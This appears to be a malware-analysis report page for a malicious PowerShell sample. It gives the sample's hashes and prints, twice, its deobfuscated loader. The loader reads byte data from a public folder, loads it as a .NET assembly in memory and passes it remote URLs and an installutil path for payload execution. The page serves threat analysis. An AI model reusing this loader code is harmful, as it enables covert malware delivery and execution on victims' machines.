Malicious
Malicious

01ac0348a623c7f4c3bed2834d528b8b

PowerShell
|
MD5: 01ac0348a623c7f4c3bed2834d528b8b
|
Size: 1.68 KB
|
application/x-powershell

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
01ac0348a623c7f4c3bed2834d528b8b
Sha1
f7c00dac9182648f683bde97db550af365837dbe
Sha256
a10ef9151e0dd03800f4ccff964a1b8d2583a2d10a82a1b6a537eaf0459f612f
Sha384
1427a36c5c1f5ce63dd7ed20076294eaa4c889d99d7f1ff7fd3d697c630d39c94921f3e7559757098bc2d3f3ae5facd0
Sha512
95d0e962fc11810775d4b7d962dcc8908cc8e8063f70f8cdc6d78820ea664c84967df7e73719ba7e922079f6573783c5128dd3f492ef81f64792ee248b2c6d5f
SSDeep
48:pAlbYyQgQaAAzccJRLRzSkdK4Oggz4J5MLLzQw:pQbYyQgQadzccDFvK4mzjLLkw
TLSH
CA319C506BF69608B2B35E05A5FF65924C3B7A7E6E79CA0D0054C14E1BB1A48CC77F32
File Structure
01ac0348a623c7f4c3bed2834d528b8b
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

$RBBfZ = "https://andrefelipedonascime1775471117328.2082219.meusitehostgator.com.br/FVTwhWzaQj_06_04_Meus_ArquivosDeTexto/PeYes" $zgHoW = "%base64%dHh0LmxiL21vYy5haXJ1b3J0c2FjLm9緒b2xhdGFjLy86c3B0dGg=" $zgHoW = ($zgHoW -replace @("緒", "n")) $cTFzN = "C:\Users\Public\kpfdb.txt" $djrbd = (Get-Content -Path $cTFzN -Encoding "UTF8") $djrbd -replace @(" ", "") [byte[]] $rfljj = [List`1]::"new"() $rfljj = ($djrbd -split "," | ForEach-Object [byte] ($_."Trim"())) $XFTCp = [Assembly]::"Load"($rfljj) $rqACJ = $XFTCp."GetType"("ClassLibrary3.Class1") $XDrQd = $rqACJ."GetMethod"("prFVI")."invoke"($tZziq, [object[]] (@($zgHoW, "C:\Users\Public\cxzkw的这五js", "D DDC:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil", "$true", $RBBfZ)))
01ac0348a623c7f4c3bed2834d528b8b (1.68 KB)
File Structure
01ac0348a623c7f4c3bed2834d528b8b
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

$RBBfZ = "https://andrefelipedonascime1775471117328.2082219.meusitehostgator.com.br/FVTwhWzaQj_06_04_Meus_ArquivosDeTexto/PeYes" $zgHoW = "%base64%dHh0LmxiL21vYy5haXJ1b3J0c2FjLm9緒b2xhdGFjLy86c3B0dGg=" $zgHoW = ($zgHoW -replace @("緒", "n")) $cTFzN = "C:\Users\Public\kpfdb.txt" $djrbd = (Get-Content -Path $cTFzN -Encoding "UTF8") $djrbd -replace @(" ", "") [byte[]] $rfljj = [List`1]::"new"() $rfljj = ($djrbd -split "," | ForEach-Object [byte] ($_."Trim"())) $XFTCp = [Assembly]::"Load"($rfljj) $rqACJ = $XFTCp."GetType"("ClassLibrary3.Class1") $XDrQd = $rqACJ."GetMethod"("prFVI")."invoke"($tZziq, [object[]] (@($zgHoW, "C:\Users\Public\cxzkw的这五js", "D DDC:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil", "$true", $RBBfZ)))

Malicious

01ac0348a623c7f4c3bed2834d528b8b
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙